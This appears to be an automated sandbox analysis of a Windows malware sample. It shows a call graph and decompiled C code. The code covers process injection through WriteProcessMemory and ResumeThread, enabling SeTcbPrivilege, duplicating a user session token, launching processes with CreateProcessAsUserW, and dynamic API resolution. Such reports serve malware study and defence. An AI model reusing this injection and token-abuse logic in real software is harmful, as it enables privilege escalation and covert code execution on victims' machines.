14606->14607 14607->14603 14617 392509 14607->14617 14608 3925c0 FindNextFileW 14609 3925dd GetLastError 14608->14609 14608->14617 14611 3925e8 14609->14611 14610 3a1d90 10 API calls 14610->14617 14611->14603 14612 392632 14611->14612 14614 39bb40 HeapFree 14611->14614 14612->14589 14613 399090 2 API calls 14613->14617 14614->14611 14615 3a0c10 _vsnwprintf 14615->14617 14616 39bb40 HeapFree 14616->14617 14617->14608 14617->14610 14617->14611 14617->14613 14617->14615 14617->14616 14619 39e520 CoCreateInstance 14618->14619 14620 39b118 14619->14620 14620->14589 14622 391050 17 API calls 14621->14622 14624 393651 14622->14624 14623 3936ab 14623->14589 14624->14623 14645 3a1870 14624->14645 14627 39366e SysAllocStringLen 14627->14589 14628 393667 SysFreeString 14628->14627 14631 397e20 11 API calls 14630->14631 14632 39c986 14631->14632 14640 39c9d6 14632->14640 14653 397070 14632->14653 14634 39c9ec 14634->14589 14635 39bb40 HeapFree 14635->14634 14636 39c9a1 14636->14640 14660 39a270 memset 14636->14660 14640->14634 14640->14635 14642 39d702 14641->14642 14643 3a1d90 10 API calls 14642->14643 14644 39d716 14643->14644 14644->14589 14648 39f1b0 14645->14648 14651 39f1c7 14648->14651 14649 396cb0 2 API calls 14649->14651 14650 39365c 14650->14623 14650->14627 14650->14628 14651->14649 14651->14650 14652 39d750 13 API calls 14651->14652 14652->14651 14654 397079 14653->14654 14655 397090 14653->14655 14656 399090 2 API calls 14654->14656 14723 3927b0 14655->14723 14658 397087 14656->14658 14658->14636 14659 39709d 14659->14636 14661 39a2b6 14660->14661 14663 39a2f7 14660->14663 14897 3926a0 14661->14897 14665 39a3fa 14663->14665 14687 39a3a4 14663->14687 14903 39f2d0 14663->14903 14670 39a41e 14665->14670 14673 39bb40 HeapFree 14665->14673 14668 398030 10 API calls 14668->14665 14675 39a42e 14670->14675 14677 39bb40 HeapFree 14670->14677 14672 397e20 11 API calls 14672->14687 14673->14670 14674 397e20 11 API calls 14676 39a2de 14674->14676 14678 39bb40 HeapFree 
14675->14678 14681 39a43e 14675->14681 14676->14665 14680 397e20 11 API calls 14676->14680 14677->14675 14678->14681 14679 39bb40 HeapFree 14682 39a44e 14679->14682 14680->14663 14681->14679 14681->14682 14683 39bb40 HeapFree 14682->14683 14684 39a45e 14682->14684 14683->14684 14685 39a471 14684->14685 14686 39bb40 HeapFree 14684->14686 14685->14640 14688 391cc0 14685->14688 14686->14685 14687->14665 14687->14668 14689 391cdd 14688->14689 14692 391ce7 14688->14692 14689->14640 14690 391d15 14691 391d37 14690->14691 14693 3926f0 2 API calls 14690->14693 14702 391eee 14690->14702 14694 391d5a 14691->14694 14695 3926f0 2 API calls 14691->14695 14700 391ed4 14691->14700 14692->14689 14692->14690 14697 3926f0 2 API calls 14692->14697 14693->14691 14696 391da4 14694->14696 14699 3926f0 2 API calls 14694->14699 14701 391eba 14694->14701 14695->14694 14698 3a0780 14 API calls 14696->14698 14697->14690 14703 391e06 14698->14703 14718 391d7c 14699->14718 14700->14702 14704 391140 VirtualFreeEx 14700->14704 14701->14700 14707 391140 VirtualFreeEx 14701->14707 14702->14640 14705 391e6d 14703->14705 14708 391e47 14703->14708 14710 396cd0 ReadProcessMemory 14703->14710 14704->14702 14706 391e87 14705->14706 14709 391140 VirtualFreeEx 14705->14709 14706->14701 14711 396cd0 ReadProcessMemory 14706->14711 14707->14700 14715 391e61 14708->14715 14906 396c50 14708->14906 14709->14706 14713 391e2e 14710->14713 14714 391ea0 14711->14714 14716 391140 VirtualFreeEx 14713->14716 14717 391140 VirtualFreeEx 14714->14717 14715->14705 14914 3a08e0 14715->14914 14716->14708 14717->14701 14718->14696 14718->14706 14720 3926f0 2 API calls 14718->14720 14721 391dc0 14720->14721 14722 39bb40 HeapFree 14721->14722 14722->14696 14724 3927be 14723->14724 14725 392816 14723->14725 14728 399090 2 API calls 14724->14728 14726 39285b 14725->14726 14734 39284b 14725->14734 14739 396d30 14725->14739 14726->14724 14752 39dfb0 14726->14752 14735 3927cc 14728->14735 14733 3928a1 14733->14724 14736 3928b3 
14733->14736 14734->14726 14815 3a1740 14734->14815 14735->14659 14785 39b3b0 14736->14785 14738 3928bd 14738->14659 14740 396d68 14739->14740 14741 392840 14740->14741 14742 396d71 GetTokenInformation 14740->14742 14741->14734 14743 395f90 14741->14743 14742->14741 14744 399090 2 API calls 14743->14744 14745 395fad 14744->14745 14746 3a1d90 10 API calls 14745->14746 14747 395fcb 14745->14747 14748 395feb 14746->14748 14747->14734 14748->14747 14749 39601a 14748->14749 14823 39c320 14748->14823 14750 39bb40 HeapFree 14749->14750 14750->14747 14753 39dfd1 memset 14752->14753 14754 39dfc7 14752->14754 14756 39dff6 14753->14756 14754->14733 14755 39e395 14755->14733 14756->14755 14757 397b30 WriteProcessMemory 14756->14757 14758 39e119 14757->14758 14758->14755 14759 399090 2 API calls 14758->14759 14760 39e13a 14759->14760 14761 396cb0 2 API calls 14760->14761 14762 39e163 GetProcAddress 14761->14762 14763 396cb0 2 API calls 14762->14763 14764 39e18b GetProcAddress 14763->14764 14765 396cb0 2 API calls 14764->14765 14766 39e1b3 GetProcAddress 14765->14766 14767 396cb0 2 API calls 14766->14767 14768 39e1db GetProcAddress 14767->14768 14769 396cb0 2 API calls 14768->14769 14770 39e203 GetProcAddress 14769->14770 14771 396cb0 2 API calls 14770->14771 14772 39e22b GetProcAddress 14771->14772 14773 396cb0 2 API calls 14772->14773 14774 39e253 GetProcAddress 14773->14774 14775 396cb0 2 API calls 14774->14775 14776 39e27b GetProcAddress 14775->14776 14776->14755 14777 39e29c 14776->14777 14777->14755 14778 397b30 WriteProcessMemory 14777->14778 14779 39e2ea 14778->14779 14779->14755 14856 396740 NtQueryInformationProcess 14779->14856 14782 397b30 WriteProcessMemory 14783 39e333 14782->14783 14783->14755 14784 39e37f ResumeThread 14783->14784 14784->14755 14786 39b3c9 14785->14786 14789 39b3d2 14785->14789 14786->14738 14787 39ba07 14788 39ba21 14787->14788 14790 397920 14 API calls 14787->14790 14791 39ba2e 14788->14791 14792 39bb40 HeapFree 14788->14792 14789->14787 14793 
39b41e GetLastError 14789->14793 14794 39b42f 14789->14794 14790->14788 14791->14738 14792->14791 14793->14787 14793->14794 14794->14787 14795 397b30 WriteProcessMemory 14794->14795 14796 39b4b0 14795->14796 14796->14787 14864 39d9d0 VirtualProtectEx 14796->14864 14798 3a1d90 10 API calls 14799 39b53f memset 14798->14799 14801 397b30 WriteProcessMemory 14799->14801 14800 39b774 14800->14787 14811 39b91f 14800->14811 14814 396cb0 memset memcpy 14800->14814 14804 39b4cc 14801->14804 14803 39b5a6 14803->14787 14805 39b68f 14803->14805 14806 397b30 WriteProcessMemory 14803->14806 14804->14787 14804->14798 14804->14803 14807 397b30 WriteProcessMemory 14804->14807 14805->14787 14805->14800 14812 397b30 WriteProcessMemory 14805->14812 14865 3917d0 14805->14865 14882 3965f0 14805->14882 14806->14803 14807->14804 14808 39b9f5 14809 39e6f0 14 API calls 14808->14809 14809->14787 14811->14787 14811->14808 14896 39d9d0 VirtualProtectEx 14811->14896 14812->14805 14814->14800 14816 3a1768 14815->14816 14817 399090 2 API calls 14816->14817 14818 3a1787 14817->14818 14819 3a1d90 10 API calls 14818->14819 14820 3a17a0 14818->14820 14821 3a17c6 14819->14821 14820->14726 14821->14820 14822 39bb40 HeapFree 14821->14822 14822->14820 14824 39c366 14823->14824 14825 39c44f 14824->14825 14826 396cb0 2 API calls 14824->14826 14828 39c474 LookupPrivilegeValueW 14825->14828 14845 39c4bf 14825->14845 14827 39c391 14826->14827 14829 39c3b0 14827->14829 14830 39c446 14827->14830 14831 39c490 AdjustTokenPrivileges 14828->14831 14828->14845 14832 396cb0 2 API calls 14829->14832 14830->14749 14831->14845 14833 39c3c1 GetProcAddress 14832->14833 14834 396cb0 2 API calls 14833->14834 14835 39c3ea GetProcAddress 14834->14835 14836 396cb0 2 API calls 14835->14836 14838 39c40d GetProcAddress 14836->14838 14837 39c6f8 14840 39c763 14837->14840 14842 39bb40 HeapFree 14837->14842 14839 396cb0 2 API calls 14838->14839 14841 39c430 GetProcAddress 14839->14841 14843 39c76d AdjustTokenPrivileges 14840->14843 
14844 39c797 14840->14844 14841->14825 14841->14830 14842->14840 14843->14844 14844->14749 14845->14837 14846 39c588 GetTokenInformation 14845->14846 14847 39c5ab GetLastError 14846->14847 14848 39c5d1 GetTokenInformation 14846->14848 14847->14837 14849 39c5ba 14847->14849 14848->14837 14852 39c5f6 14848->14852 14850 3a1d90 10 API calls 14849->14850 14851 39c5c4 14850->14851 14851->14837 14851->14848 14852->14837 14853 399090 2 API calls 14852->14853 14854 39c69d 14853->14854 14854->14837 14855 39c6c6 CreateProcessAsUserW 14854->14855 14855->14837 14857 39676e 14856->14857 14863 3967b5 14856->14863 14858 396cd0 ReadProcessMemory 14857->14858 14859 396780 14858->14859 14860 396cd0 ReadProcessMemory 14859->14860 14859->14863 14861 396796 14860->14861 14862 396cd0 ReadProcessMemory 14861->14862 14861->14863 14862->14863 14863->14755 14863->14782 14863->14783 14864->14804 14866 399090 2 API calls 14865->14866 14867 3917f4 14866->14867 14868 396cb0 2 API calls 14867->14868 14869 391802 GetProcAddress 14868->14869 14871 391828 14869->14871 14872 39188b 14869->14872 14873 391170 11 API calls 14871->14873 14874 39189b 14872->14874 14875 39bb40 HeapFree 14872->14875 14876 391838 14873->14876 14874->14805 14875->14874 14876->14872 14877 3926f0 2 API calls 14876->14877 14878 391861 14877->14878 14878->14872 14879 3a0780 14 API calls 14878->14879 14880 391875 14879->14880 14881 391140 VirtualFreeEx 14880->14881 14881->14872 14883 399090 2 API calls 14882->14883 14884 396612 14883->14884 14885 396cb0 2 API calls 14884->14885 14886 396620 GetProcAddress 14885->14886 14888 3966b0 14886->14888 14889 396646 14886->14889 14888->14805 14892 3926f0 2 API calls 14889->14892 14894 39666e 14889->14894 14890 3966a4 14890->14805 14891 3a0780 14 API calls 14893 396686 14891->14893 14892->14894 14893->14890 14895 391140 VirtualFreeEx 14893->14895 14894->14890 14894->14891 14895->14890 14896->14811 14898 3966c0 11 API calls 14897->14898 14899 3926a9 14898->14899 14900 39bb60 14899->14900 
14901 3966c0 11 API calls 14900->14901 14902 39a2cb 14901->14902 14902->14674 14904 3966c0 11 API calls 14903->14904 14905 39a390 14904->14905 14905->14672 14905->14687 14907 396c65 14906->14907 14908 396c5e 14906->14908 14910 396c9f 14907->14910 14911 396c91 14907->14911 14958 392e90 14907->14958 14927 394bf0 14908->14927 14910->14708 14985 3b2080 14911->14985 14922 3a0904 14914->14922 14915 3a09c5 14916 3a09d2 14915->14916 14918 39bb40 HeapFree 14915->14918 14919 3a09e5 14916->14919 14921 39bb40 HeapFree 14916->14921 14917 3a0923 lstrlenW 15321 39ba40 14917->15321 14918->14916 14919->14705 14921->14919 14922->14915 14922->14917 14923 39bb40 HeapFree 14922->14923 14924 397e20 11 API calls 14922->14924 14925 3a0500 14 API calls 14922->14925 14926 397af0 14 API calls 14922->14926 14923->14922 14924->14922 14925->14922 14926->14922 14928 39e520 CoCreateInstance 14927->14928 14929 394c1a 14928->14929 14930 399090 2 API calls 14929->14930 14931 394c28 14930->14931 14932 399090 2 API calls 14931->14932 14952 394eea 14931->14952 14933 394c5f 14932->14933 14935 3a0c10 _vsnwprintf 14933->14935 14934 39bb40 HeapFree 14936 394f09 14934->14936 14956 394c82 14935->14956 14937 394f1d 14936->14937 14939 39bb40 HeapFree 14936->14939 14938 394f30 14937->14938 14940 39bb40 HeapFree 14937->14940 14938->14907 14939->14937 14940->14938 14941 39bb40 HeapFree 14941->14956 14942 399090 2 API calls 14942->14956 14943 3a0c10 _vsnwprintf 14943->14956 14945 394d1e _time64 14945->14956 14946 394d59 _time64 14946->14956 14948 394deb Sleep 14949 394dfc 14948->14949 14948->14956 14949->14956 14951 394e3a GetFileAttributesW 14951->14956 14952->14934 14952->14936 14953 391a80 2 API calls 14954 394ea6 _time64 14953->14954 14954->14956 14955 394e69 CreateDirectoryW 14955->14956 14956->14936 14956->14941 14956->14942 14956->14943 14956->14946 14956->14948 14956->14951 14956->14952 14956->14953 14956->14955 14957 392e90 23 API calls 14956->14957 15005 39ed90 CreateFileW 14956->15005 15007 395a10 
14956->15007 15021 399f70 14956->15021 14957->14956 14959 39e520 CoCreateInstance 14958->14959 14960 392eb6 14959->14960 14961 397e20 11 API calls 14960->14961 14962 392ec6 14961->14962 14963 399090 2 API calls 14962->14963 14984 393007 14962->14984 14964 392edf 14963->14964 14969 399090 2 API calls 14964->14969 14964->14984 14965 39bb40 HeapFree 14967 393017 14965->14967 14966 393027 14966->14907 14967->14966 14968 39bb40 HeapFree 14967->14968 14968->14966 14970 392f17 14969->14970 14971 3a0c10 _vsnwprintf 14970->14971 14972 392f3a 14971->14972 14973 399090 2 API calls 14972->14973 14972->14984 14974 392f53 14973->14974 14984->14965 14984->14967 14986 39e520 CoCreateInstance 14985->14986 14987 3b20ac 14986->14987 14988 397e20 11 API calls 14987->14988 15000 3b20bc 14988->15000 14989 3b21aa 14990 3b21c0 14989->14990 14992 39bb40 HeapFree 14989->14992 14991 3b21d4 14990->14991 14993 39bb40 HeapFree 14990->14993 14994 3b21e6 14991->14994 14995 39bb40 HeapFree 14991->14995 14992->14990 14993->14991 14994->14907 14995->14994 14996 395a10 58 API calls 14996->15000 14997 3b2102 Sleep 14997->15000 14998 399f70 13 API calls 14998->15000 14999 3b2157 14999->14989 14999->14990 15001 3a0500 14 API calls 14999->15001 15000->14989 15000->14996 15000->14997 15000->14998 15000->14999 15002 39bb40 HeapFree 15000->15002 15003 3b219b 15001->15003 15002->15000 15003->14989 15004 397af0 14 API calls 15003->15004 15004->14989 15006 39edbf 15005->15006 15006->14945 15009 395a30 15007->15009 15008 395b5c 15008->14956 15009->15008 15016 3990f0 32 API calls 15009->15016 15019 395b2d Sleep 15009->15019 15020 395aba Sleep 15009->15020 15024 395280 15009->15024 15045 391200 15009->15045 15060 396e80 15009->15060 15076 3a0dc0 15009->15076 15097 39e5e0 15009->15097 15116 39bbb0 15009->15116 15156 3a13a0 15009->15156 15173 396f60 15009->15173 15016->15009 15019->15009 15020->15009 15022 3968a0 13 API calls 15021->15022 15023 399f98 15022->15023 15023->14956 15025 395390 15024->15025 15026 3952a4 
15024->15026 15025->15009 15026->15025 15046 3912c0 15045->15046 15047 391227 15045->15047 15046->15009 15047->15046 15061 396f4a 15060->15061 15062 396ea7 15060->15062 15061->15009 15062->15061 15077 3a0eb9 15076->15077 15078 3a0de5 15076->15078 15077->15009 15078->15077 15098 39e604 15097->15098 15099 39e6e6 15097->15099 15098->15099 15099->15009 15117 39bbf1 15116->15117 15118 39bbe0 15116->15118 15117->15009 15118->15117 15157 3a1498 15156->15157 15158 3a13c4 15156->15158 15157->15009 15158->15157 15174 39705e 15173->15174 15175 396f84 15173->15175 15174->15009 15175->15174 15323 39ba78 15321->15323 15322 39ba7c 15322->14922 15323->15322 15324 3a1d90 10 API calls 15323->15324 15326 39ba90 15324->15326 15325 39babd 15325->14922 15326->15325 15327 39bb40 HeapFree 15326->15327 15327->15325 16767 3a0c80 16768 3a0ca1 16767->16768 16771 3a0ca7 16767->16771 16769 39bb40 HeapFree 16768->16769 16769->16771 16770 3a1d90 10 API calls 16772 3a0cb7 16770->16772 16771->16770 16773 3a0d77 16772->16773 16774 3a0cc4 GetAdaptersInfo 16772->16774 16779 3a0d99 16773->16779 16782 39bb40 HeapFree 16773->16782 16775 3a0cdc 16774->16775 16776 3a0ce6 16774->16776 16778 3a1d90 10 API calls 16775->16778 16776->16773 16777 39f720 11 API calls 16776->16777 16780 3a0d26 16777->16780 16778->16776 16781 3a0da6 16779->16781 16784 39bb40 HeapFree 16779->16784 16783 3a0d2a 16780->16783 16785 3a1d90 10 API calls 16780->16785 16782->16779 16784->16781 16787 3a0d44 16785->16787 16786 3a0c10 _vsnwprintf 16786->16787 16787->16773 16787->16783 16787->16786 18019 39b4fc 18020 39b500 18019->18020 18021 3a1d90 10 API calls 18020->18021 18022 39ba07 18020->18022 18029 397b30 WriteProcessMemory 18020->18029 18030 39b5a6 18020->18030 18023 39b53f memset 18021->18023 18024 39ba21 18022->18024 18026 397920 14 API calls 18022->18026 18025 397b30 WriteProcessMemory 18023->18025 18027 39ba2e 18024->18027 18028 39bb40 HeapFree 18024->18028 18025->18020 18026->18024 18028->18027 18029->18020 18030->18022 18032 
397b30 WriteProcessMemory 18030->18032 18036 39b68f 18030->18036 18031 3917d0 15 API calls 18031->18036 18032->18030 18033 39b9f5 18034 39e6f0 14 API calls 18033->18034 18034->18022 18035 3965f0 15 API calls 18035->18036 18036->18022 18036->18031 18036->18035 18038 397b30 WriteProcessMemory 18036->18038 18040 39b774 18036->18040 18037 39b91f 18037->18022 18037->18033 18042 39d9d0 VirtualProtectEx 18037->18042 18038->18036 18040->18022 18040->18037 18041 396cb0 memset memcpy 18040->18041 18041->18040 18042->18037 13502 39fd69 13530 392420 13502->13530 13505 39fda9 13532 391b20 13505->13532 13507 39fdb4 13508 39fdbc ??2@YAPAXI 13507->13508 13509 39fdd0 13508->13509 13550 3970b0 13509->13550 13531 392429 ??3@YAXPAX 13530->13531 13531->13505 13533 391b30 13532->13533 13534 391b3b memset memset 13533->13534 13678 394a10 13534->13678 13536 391b6c 13705 39f0a0 13536->13705 13539 391b8c ??2@YAPAXI 13543 391bad 13539->13543 13544 391ba4 13539->13544 13540 391b85 13708 392df0 13540->13708 13714 3a14a0 13543->13714 13761 39cbf0 13544->13761 13547 391bca 13749 39ce00 _time64 13547->13749 13549 391bd1 13549->13507 13679 394a38 13678->13679 13680 399090 2 API calls 13679->13680 13681 394a46 13680->13681 13764 396cb0 13681->13764 13685 394a7e 13686 394a86 GetNativeSystemInfo 13685->13686 13689 394a97 13686->13689 13687 399090 2 API calls 13688 394b3e 13687->13688 13690 399090 2 API calls 13688->13690 13689->13687 13691 394b58 13690->13691 13692 3a1d90 10 API calls 13691->13692 13693 394b64 13692->13693 13694 394b6d 13693->13694 13695 394b79 13693->13695 13696 394bb6 13693->13696 13694->13536 13697 399090 2 API calls 13695->13697 13698 399090 2 API calls 13696->13698 13699 394b87 13697->13699 13700 394bc4 13698->13700 13767 3a0c10 13699->13767 13701 3a0c10 _vsnwprintf 13700->13701 13703 394be4 13701->13703 13703->13536 13780 391c70 13705->13780 13707 391b74 ??2@YAPAXI 13707->13539 13707->13540 13709 399090 2 API calls 13708->13709 13710 392e25 GetFileAttributesW 13709->13710 13711 
392e42 13710->13711 13712 392e83 13711->13712 13713 392e6f CreateDirectoryW 13711->13713 13712->13539 13713->13712 13715 3a14c6 13714->13715 13716 3a14c0 13714->13716 13718 399090 2 API calls 13715->13718 13717 39bb40 HeapFree 13716->13717 13717->13715 13719 3a14dd 13718->13719 13785 393c70 CreateFileW 13719->13785 13722 399090 2 API calls 13723 3a150a 13722->13723 13724 393c70 15 API calls 13723->13724 13725 3a151e 13724->13725 13726 399090 2 API calls 13725->13726 13748 3a171d 13725->13748 13727 3a153a 13726->13727 13728 393c70 15 API calls 13727->13728 13729 3a154e 13728->13729 13730 3a1d90 10 API calls 13729->13730 13729->13748 13734 3a1588 13730->13734 13748->13547 13750 39ce28 13749->13750 13760 39ce8a 13749->13760 13750->13760 13797 3b1e30 13750->13797 13760->13549 13762 3a1d90 10 API calls 13761->13762 13763 39cc17 13762->13763 13763->13543 13771 3a12a0 13764->13771 13768 3a0c1c 13767->13768 13769 3a0c2d _vsnwprintf 13768->13769 13770 394bac 13768->13770 13769->13770 13770->13536 13774 3950b0 13771->13774 13775 394a57 GetProcAddress 13774->13775 13777 3950d0 13774->13777 13775->13685 13775->13686 13776 395186 memset 13779 39519c 13776->13779 13777->13775 13777->13776 13777->13779 13778 395202 memcpy 13778->13775 13779->13775 13779->13778 13781 3a12a0 2 API calls 13780->13781 13782 391c8a 13781->13782 13783 3a1d90 10 API calls 13782->13783 13784 391c96 13783->13784 13784->13707 13786 393cab SetFilePointer SetFilePointer 13785->13786 13793 393cd9 13785->13793 13787 393ce0 13786->13787 13786->13793 13788 3a1d90 10 API calls 13787->13788 13789 393ce8 13788->13789 13790 393cf1 ReadFile 13789->13790 13789->13793 13791 393d0e 13790->13791 13790->13793 13792 39bb40 HeapFree 13791->13792 13792->13793 13793->13722 13793->13748 13815 3b1d30 13797->13815 13799 3b1fb1 13809 399090 memset memcpy 13812 3b1e52 13809->13812 13812->13799 13812->13809 13813 39bb40 HeapFree 13812->13813 13818 3b1320 13812->13818 13826 3b13d0 13812->13826 13841 3b1660 13812->13841 13813->13812 

    Executed Functions

    Control-flow Graph

    [Control-flow graph for function 0x39C320; nodes are marked as executed or not executed. API calls labelled on the graph: GetProcAddress, LookupPrivilegeValueW, AdjustTokenPrivileges, GetTokenInformation, GetLastError, CreateProcessAsUserW.]
    C-Code - Quality: 69%
    			E0039C320(void** _a4, intOrPtr* _a8, WCHAR* _a12, long _a16) {
    				int _v8;
    				long _v12;
    				int _v16;
    				int _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				int _v36;
    				int _v40;
    				long _v44;
    				void* _v48;
    				struct _PROCESS_INFORMATION _v64;
    				void* _v68;
    				void* _v72;
    				void* _v76;
    				void* _v80;
    				void* _v84;
    				char* _v88;
    				void* _v92;
    				char _v96;
    				intOrPtr _v100;
    				struct _TOKEN_PRIVILEGES _v112;
    				struct _TOKEN_PRIVILEGES _v128;
    				char _v228;
    				struct _STARTUPINFOW _v296;
    				char _v496;
    				char _v1008;
    				void* _v1520;
    				intOrPtr _t122;
    				void* _t125;
    				void* _t126;
    				void* _t127;
    				void* _t128;
    				void* _t129;
    				void* _t130;
    				void* _t131;
    				intOrPtr _t141;
    				void* _t146;
    				intOrPtr _t147;
    				void* _t148;
    				intOrPtr _t149;
    				void* _t152;
    				void* _t154;
    				intOrPtr _t157;
    				void* _t158;
    				void* _t162;
    				intOrPtr _t165;
    				void* _t166;
    				void* _t170;
    				long _t172;
    				void* _t175;
    				signed int _t176;
    				void* _t177;
    				void* _t181;
    				_Unknown_base(*)()* _t199;
    				intOrPtr _t201;
    				intOrPtr _t205;
    				intOrPtr _t207;
    				char* _t214;
    				void** _t226;
    				intOrPtr _t237;
    				intOrPtr _t239;
    				intOrPtr _t251;
    				void* _t259;
    				intOrPtr _t263;
    				intOrPtr _t267;
    				signed int _t269;
    				signed int _t270;
    				void* _t271;
    				struct HINSTANCE__* _t272;
    				void* _t273;
    				void* _t275;
    				_Unknown_base(*)()* _t279;
    
    				_t201 =  *0x3b8628; // 0x593938
    				_v8 = 0;
    				_v20 = 0;
    				_v24 = 0xffffffff;
    				_v28 = 0;
    				_v36 = 0;
    				_v16 = 0;
    				_v296.cb = 0x44;
    				_v40 = 0;
    				 *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xb8))))( &_v296);
    				_v64.hProcess = 0;
    				_v64.hThread = 0;
    				_v64.dwProcessId = 0;
    				_v64.dwThreadId = 0;
    				_t279 =  *0x3b85c8; // 0x73bd1f81
    				if(_t279 != 0) {
    					L4:
    					_t122 =  *0x3b8628; // 0x593938
    					_v44 = 0;
    					_t29 = _t122 + 0x150; // 0x593a88
    					_t269 = _t29;
    					_t125 =  *((intOrPtr*)( *_t269))( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x100))))(0x28,  &_v16));
    					__eflags = _t125;
    					if(_t125 != 0) {
    						_t181 = LookupPrivilegeValueW(0, L"SeTcbPrivilege",  &(_v112.Privileges)); // executed
    						__eflags = _t181;
    						if(_t181 != 0) {
    							_v112.PrivilegeCount = 1;
    							_v100 = 2;
    							AdjustTokenPrivileges(_v16, 0,  &_v112, 0x10,  &_v128,  &_v44);
    						}
    					}
    					_t126 =  *0x3b85dc; // 0x73bd4023
    					_t270 = _t269 | 0xffffffff;
    					__eflags = _t126;
    					if(_t126 == 0) {
    						L18:
    						_t127 =  *0x3b85fc; // 0x0
    						__eflags = _t127;
    						if(_t127 == 0) {
    							goto L31;
    						} else {
    							_t270 =  *_t127();
    							__eflags = _t270 - 0xffffffff;
    							if(_t270 == 0xffffffff) {
    								goto L31;
    							} else {
    								goto L20;
    							}
    						}
    					} else {
    						_t175 =  *_t126(0, 0, 1,  &_v28,  &_v36); // executed
    						__eflags = _t175;
    						if(_t175 == 0) {
    							goto L18;
    						} else {
    							_t259 = _v36;
    							_t267 = _v28;
    							_t176 = 0;
    							__eflags = _t259;
    							if(_t259 > 0) {
    								_t226 = _t267 + 8;
    								while(1) {
    									__eflags =  *_t226;
    									if( *_t226 == 0) {
    										_t270 =  *(_t267 + (_t176 + _t176 * 2) * 4);
    										goto L15;
    									}
    									_t176 = _t176 + 1;
    									_t226 =  &(_t226[3]);
    									__eflags = _t176 - _t259;
    									if(_t176 < _t259) {
    										continue;
    									} else {
    									}
    									goto L15;
    								}
    							}
    							L15:
    							_t177 =  *0x3b85f8; // 0x73bd1b65
    							__eflags = _t177;
    							if(_t177 != 0) {
    								 *_t177(_t267);
    							}
    							__eflags = _t270 - 0xffffffff;
    							if(_t270 != 0xffffffff) {
    								L20:
    								_t207 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x190))))();
    								_t146 =  *0x3b85c8(_t270,  &_v24); // executed
    								__eflags = _t146;
    								if(_t146 == 0) {
    									L31:
    									_t271 = _v48;
    								} else {
    									_t147 =  *0x3b8628; // 0x593938
    									_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x144))))(_v24, 0x2000000, 0, 1, 1,  &_v8);
    									__eflags = _t148;
    									if(_t148 == 0) {
    										goto L31;
    									} else {
    										_t149 =  *0x3b8628; // 0x593938
    										 *((intOrPtr*)( *((intOrPtr*)(_t149 + 0xf8))))(_v24);
    										_v12 = 0;
    										_t271 = 0; // executed
    										_t152 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
    										__eflags = _t152;
    										if(_t152 != 0) {
    											L25:
    											_t154 = GetTokenInformation(_v8, 1, _t271, _v12,  &_v12); // executed
    											__eflags = _t154;
    											if(_t154 != 0) {
    												_t214 =  &_v32;
    												_t157 =  *0x3b8628; // 0x593938
    												_v32 = 0x100;
    												_v1008 = 0;
    												_v1520 = 0;
    												_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x140))))(0,  *_t271,  &_v1008, _t214,  &_v1520, _t214,  &_v48);
    												__eflags = _t158;
    												if(_t158 != 0) {
    													_v96 = 0;
    													_v88 = 0;
    													_v92 = 0;
    													_v84 = 0;
    													_v80 = 0;
    													_v76 = 0;
    													_v72 = 0;
    													_v68 = 0;
    													_v88 =  &_v1008;
    													_t251 =  *0x3b8628; // 0x593938
    													_v96 = 0x20;
    													_t85 = _t251 + 0x200; // 0x75501aac
    													_t162 =  *((intOrPtr*)( *_t85))(_v8,  &_v96); // executed
    													__eflags = _t162;
    													if(__eflags != 0) {
    														_v296.wShowWindow = 0;
    														E00399090(__eflags,  &_v496, 0x9c);
    														_t273 = _t273 + 8;
    														_v296.lpDesktop =  &_v496;
    														_t165 =  *0x3b8628; // 0x593938
    														_t91 = _t165 + 0x1f8; // 0x75501a7a
    														_t166 =  *((intOrPtr*)( *_t91))( &_v20, _v8, 0); // executed
    														__eflags = _t166;
    														if(_t166 != 0) {
    															_t170 = CreateProcessAsUserW(_v8, 0, _a12, 0, 0, 0, _a16, _v20, 0,  &_v296,  &_v64); // executed
    															__eflags = _t170;
    															if(_t170 != 0) {
    																 *_a4 = _v64.hProcess;
    																 *_a8 = _v64.hThread;
    																_v40 = 1;
    															}
    														}
    													}
    												}
    											}
    										} else {
    											_t172 = GetLastError();
    											__eflags = _t172 - 0x7a;
    											if(_t172 == 0x7a) {
    												_t271 = E003A1D90(_v12, 0);
    												_t273 = _t273 + 8;
    												__eflags = _t271;
    												if(_t271 != 0) {
    													goto L25;
    												}
    											}
    										}
    									}
    								}
    							} else {
    								goto L18;
    							}
    						}
    					}
    					_t128 = _v68;
    					__eflags = _t128;
    					if(_t128 != 0) {
    						_t141 =  *0x3b8628; // 0x593938
    						_t108 = _t141 + 0x204; // 0x75503e6f
    						 *((intOrPtr*)( *_t108))(_v8, _t128); // executed
    					}
    					_t129 = _v8;
    					__eflags = _t129;
    					if(_t129 != 0) {
    						_t239 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t239 + 0xf8))))(_t129);
    					}
    					_t130 = _v20;
    					__eflags = _t130;
    					if(_t130 != 0) {
    						_t205 =  *0x3b8628; // 0x593938
    						_t112 = _t205 + 0x1fc; // 0x75501a4e
    						 *((intOrPtr*)( *_t112))(_t130);
    					}
    					__eflags = _t271;
    					if(_t271 != 0) {
    						E0039BB40(_t271);
    					}
    					_t131 = _v16;
    					__eflags = _t131;
    					if(_t131 != 0) {
    						AdjustTokenPrivileges(_t131, 0,  &_v128, 0x10, 0, 0); // executed
    						_t237 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t237 + 0xf8))))(_v16);
    					}
    					return _v40;
    				} else {
    					E00396CB0( &_v228, 0x97);
    					_t263 =  *0x3b8628; // 0x593938
    					_t275 = _t273 + 8;
    					_t272 =  *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x48))))( &_v228);
    					if(_t272 == 0) {
    						L3:
    						return 0;
    					} else {
    						E00396CB0( &_v228, 0x98);
    						 *0x3b85dc = GetProcAddress(_t272,  &_v228);
    						E00396CB0( &_v228, 0x99);
    						 *0x3b85f8 = GetProcAddress(_t272,  &_v228);
    						E00396CB0( &_v228, 0x9a);
    						 *0x3b85fc = GetProcAddress(_t272,  &_v228);
    						E00396CB0( &_v228, 0x9b);
    						_t273 = _t275 + 0x20;
